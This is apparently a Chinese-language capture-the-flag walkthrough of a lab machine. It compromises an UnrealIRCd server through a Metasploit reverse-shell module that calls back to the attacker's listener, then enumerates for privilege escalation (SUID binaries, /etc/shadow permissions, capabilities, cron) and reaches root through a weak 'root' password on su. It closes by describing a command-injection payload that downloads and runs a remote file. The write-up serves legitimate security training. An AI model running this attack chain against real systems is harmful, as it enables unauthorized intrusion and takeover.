getwebshell
: nmap
发现UnrealIRCd
→ irc
漏洞利用
提 权 思 路
: su
弱密码提权
192.168.45.239
192.168.172.120
sudo nmap --min-rate 10000 -p- 192.168.172.120
PORT STATE SERVICE
6667/tcp open irc
6697/tcp open ircs-u
8067/tcp open infi-async
# tcp探测
sudo nmap -sT -sV -O -sC -p6667,6697,8067 192.168.172.120
PORT STATE SERVICE VERSION
6667/tcp open irc UnrealIRCd
6697/tcp open irc UnrealIRCd
8067/tcp open irc UnrealIRCd (Admin email [email protected])
根据探测的端口进行进一步的测试,这三个端口没有见过nmap
探测开放的服务都是irc
版本是UnrealIRCd
探测到了邮箱内容 Admin email [email protected]
通过搜索可以确定UnrealIRCd
是开源,存在漏洞的情况较大
粗略的了解一下内容
在遇到不知道的情况下可以借助msf帮助
msf6 → searchsploit unrealircd
但是我们不确定版本,在没思路的情况下尝试盲打,首先选用msf自带的
msfconsole
msf6 → search unrealircd
msf6 → use 0
msf6 → show options
确定了只需要目标以及端口
msf6 → set rhosts 192.168.172.120
msf6 → set payload 7
选择反弹shell
msf6 → set lhost 192.168.45.239
设置监听host
运行得到shell
由于获取的shell交互不友好,利用python获得新的交互shell
# 如果是msf的要先shell
shell
发现shell
失败
# 利用python获取交互shell -> python失败使用python3
python -c "import pty;pty.spawn('/bin/bash')";
server@noontide:~/irc/Unreal3.2$ find / -name local.txt 2>/dev/null
/home/server/local.txt
server@noontide:~/irc/Unreal3.2$ cat /home/server/local.txt
ed03c20077957b11b1b936f8a70fd0c4
提权的本质在于枚举
,在获取shell之后我们要进行内网信息的收集,都是为了提权
做准备
较老的Ubuntu
以及Linux系统可以overlayfs
提权
# 确定发行版本
server@noontide:~/irc/Unreal3.2$ lsb_release -a
No LSB modules are available.
Distributor ID: Debian
Description: Debian GNU/Linux 10 (buster)
Release: 10
Codename: buster
发行版本为Debian
,不太能overlayfs
提权
较低的内核版本可以进行脏牛
提权
server@noontide:~/irc/Unreal3.2$ uname -a
Linux noontide 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux
内核版本为4.19.0
server@noontide:~/irc/Unreal3.2$ id
uid=1000(server) gid=1000(server) groups=1000(server),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
查找具有sudo
权限,且不需要密码的可提权文件
如果发现sudo -l
有东西的话 访问 https://gtfobins.github.io
寻找
# 利用sudo -l寻找
server@noontide:~/irc/Unreal3.2$ sudo -l
bash: sudo: command not found
发现不存在sudo
如果发现u=s
有东西的话 访问 https://gtfobins.github.io
寻找
# -perm 文件权限
server@noontide:~/irc/Unreal3.2$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/fusermount
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/umount
/usr/bin/mount
/usr/bin/su
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
如果/etc/passwd
具有写入权限可以尝试覆盖密码提权
server@noontide:~/irc/Unreal3.2$ ls -al /etc/passwd
-rw-r--r-- 1 root root 1440 Aug 8 2020 /etc/passwd
/etc/shadow
具有写入权限可以尝试覆盖密码提权/etc/shadow
具有可读权限可以爆破密码server@noontide:~/irc/Unreal3.2$ ls -al /etc/shadow
-rw-r----- 1 root shadow 950 Dec 3 2020 /etc/shadow
高版本下suid
列举不全,查看getcap
# 探查有CAP_SETUID标志的进程
server@noontide:~/irc/Unreal3.2$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_raw+ep
查找所有的定时任务,并且查看定时任务是否具有修改权限
# 寻找定时任务并修改进行提权
cat /etc/crontab
可能用户留下的历史信息具有有用的信息
history
/home
目录下的用户可以做账号字典尝试弱密码
以及爆破
server@noontide:~/irc/Unreal3.2$ ls -al /home
drwxr-xr-x 3 server server 4096 Dec 3 2020 server
# 例如.ssh找密码 ./*_history找历史记录等
ls -al /home/server
找到一个文件
# Generated by /usr/bin/select-editor SELECTED_EDITOR="/bin/nano"
server@noontide:~/irc$ su
Password: root
root@noontide:/home/server/irc# id
uid=0(root) gid=0(root) groups=0(root)
root@noontide:/home/server/irc# cat /root/proof.txt
b6dd9e1ceb4383125727e3101987689d
完结撒花~
以后提权尝试第一条 su
弱密码,应该在利用sudo
发现没有命令的时候尝试一下
了解了一下漏洞原理
cat /usr/share/exploitdb/exploits/linux/remote/13853.pl
大致利用思路 是连接6667端口时直接插入 AB;payload
利用;
可以绕过进行命令执行,这里下载远程文件并执行